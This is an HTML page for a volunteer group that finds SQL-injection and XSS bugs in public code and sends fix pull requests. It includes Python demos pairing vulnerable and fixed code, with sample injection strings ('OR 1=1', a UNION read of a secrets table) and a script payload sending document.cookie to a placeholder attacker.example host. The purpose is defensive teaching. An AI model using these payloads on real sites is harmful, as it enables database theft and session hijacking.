<html>
<head>
<title>The Programmer Education Foundation</title>
<style type="text/css">
body {
width: 40em;
margin-left: auto;
margin-right: auto;
color: #222;
background-color: #ECFCC7;
font-family: 'Museo Sans', Tahoma, sans-serif;
font-size: 18px;
}
</style>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-40861100-1', 'github.io');
ga('send', 'pageview');
</script>
</head>
<body>
<h1>The Programmer Education Foundation</h1>
<p>
Web developers are almost entirely self-taught; even if they attended
university for a computer science degree, it is almost certain they
never had a course that taught them about XSS or SQL injection.
</p>
<p>
We aim to seek out developers who are unwittingly making fatal
mistakes, and educate them so they may continue on a path towards
being a great programmer.
</p>
<p>
Because examples are the best way to educate, our lessons take the
form of pull requests: only by pairing background information with a
concrete fix to the developer's own code can we expect results.
</p>
<h2>Motivation</h2>
<p>
Every now and then someone <a
href="http://www.reddit.com/r/lolphp/comments/1e4foy/the_love_story_of_mysql_query_and_get_on_github/">points
out</a> that GitHub's code search can be used to find many extremely
vulnerable programs. The reaction is usually 95% "glad I'm not that
stupid" and 5% "look at me taking advantage of them".
</p>
<p>
As a community of professionals, we're better than that. We should
recognize that most errors come from ignorance, not lack of
intelligence, and attack the problem as such. Plus, being mean is
just not cool. Don't be a dick.
</p>
<h2>Rules</h2>
<ol>
<li>Be nice.</li>
<li>Be informative.</li>
<li>Don't duplicate others' work.</li>
</ol>
<h2>Problems</h2>
<h3>SQL Injection</h3>
<p>
Allowing user data into your database queries without parameterization
or escaping, so that an attacker can change the query's structure and
run arbitrary SQL against your database: read other tables, alter or
delete data, or bypass authentication checks.
</p>
<p>
See <a href="http://bobby-tables.com/">bobby-tables.com</a> for more
information on how to avoid this in different languages.
</p>
<h4>Helpful Searches</h4>
<ul>
<li>(PHP): <a
href="https://github.com/search?p=1&q=extension%3Aphp+mysql_query+%24_GET&ref=searchresults&type=Code">$_GET
and mysql_query</a></li>
</ul>
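<p>
The following is an added example, not code from this page or from any
project it links to. It shows the same defect the PHP search above
finds (a request parameter concatenated into the SQL text) beside its
parameterized fix, using Python's built-in sqlite3 module as a
stand-in for MySQL so it runs offline. The tables, rows and the
<code>secrets</code> table are constructed sample data.
</p>

```python
import sqlite3

# Constructed sample data standing in for the MySQL tables behind a typical
# mysql_query($_GET[...]) script; none of it comes from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.execute("CREATE TABLE secrets (name TEXT, value TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    conn.execute("INSERT INTO secrets VALUES (?, ?)", ("api_key", "constructed-secret-0000"))
    conn.commit()
    return conn

def lookup_vulnerable(conn, username):
    # Vulnerable: the request parameter becomes part of the SQL text, exactly
    # like mysql_query("SELECT ... WHERE username='" . $_GET['user'] . "'").
    # A single quote in the input ends the string literal and the rest of the
    # input is parsed as SQL.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    # Hardened: the value is bound by the driver, so its content is always data
    # and never SQL, whatever characters it contains. This is the equivalent of
    # PDO prepare()/execute() or mysqli bind_param() in PHP.
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

# Constructed attacker inputs.
TAUTOLOGY = "x' OR '1'='1"                                        # returns every row
UNION_DUMP = "x' UNION SELECT name, value FROM secrets WHERE '1'='1"  # reads another table

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, tautology:", lookup_vulnerable(conn, TAUTOLOGY))
    print("vulnerable, union    :", lookup_vulnerable(conn, UNION_DUMP))
    print("safe, tautology      :", lookup_safe(conn, TAUTOLOGY))
    print("safe, union          :", lookup_safe(conn, UNION_DUMP))
    print("safe, real user      :", lookup_safe(conn, "alice"))
```

<p>
Escaping the value (mysql_real_escape_string in PHP) only closes the
string-literal case; a parameter used as a bare number or a column
name is still injectable, and the mysql_* extension itself was removed
in PHP 7. Prepared statements with bound parameters are the fix to
recommend in a pull request.
</p>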
<h3>XSS</h3>
<p>
A cross-site scripting vulnerability allows an attacker to execute
arbitrary JavaScript in your site's origin when your users visit a
particular page. They can use this for a number of attacks; for
instance, sending users' session cookies to a server they control,
then using those cookies to log in as the users.
</p>
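<p>
The following is an added example, not code from this page or from any
project it links to. It shows a reflected XSS of the kind the text
describes (a request parameter echoed into the page unencoded) beside
the output-encoded fix, in Python so the two renderings can be
compared offline. The payload and the host <code>attacker.example</code>
are constructed; the host is a placeholder, not a real endpoint.
</p>

```python
import html

# Constructed attacker payload: loads an image from a host the attacker
# controls, with the victim's cookies appended to the URL, which is the
# "send the session to a remote server" attack described above.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'

def render_vulnerable(search_term):
    # Vulnerable: the untrusted value is concatenated straight into the HTML,
    # like echo "You searched for: " . $_GET['q']; in PHP. The browser cannot
    # tell the attacker's <script> from markup the site intended to send.
    return "<p>You searched for: " + search_term + "</p>"

def render_safe(search_term):
    # Hardened: HTML-encode the value for the context it lands in. html.escape
    # turns < > & into entities, and with quote=True also encodes ' and ", so
    # the same call is safe inside a quoted attribute value. It is NOT enough
    # for a value placed inside a <script> block, an unquoted attribute, or a
    # URL; those contexts need their own encoders.
    return "<p>You searched for: " + html.escape(search_term, quote=True) + "</p>"

def contains_script_tag(page):
    # Crude check used here to make the difference between the two renderings
    # visible; it is not a sanitizer and must not be used as one.
    return "<script" in page.lower()

if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_safe(PAYLOAD))
```

<p>
Marking the session cookie <code>HttpOnly</code> keeps
<code>document.cookie</code> from reading it, which blunts this
particular payload, but injected script can still issue requests as the
logged-in user from inside the page, so encoding output on the way into
the HTML remains the actual fix.
</p>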
<h2>Contribute</h2>
<p>
Interested in helping? <a
href="https://github.com/programmer-education-foundation/volunteers/issues/new">Open
an issue</a> on the volunteers repository and we'll add you to the
organization. Please list any language-groups you'd like to be a part
of (e.g. PHP) if you'd like to get pinged periodically for advice.
</p>
<p>
Once you're a part of the organization, find a project with a problem
and fork it to PEF. Fix the problem, send in a pull request, and feel
good about yourself. See <a
href="https://github.com/d7my11/alwaleed/pull/1">our first pull
request</a> for an example of the type of thing we're looking for.
</p>
</body>
</html>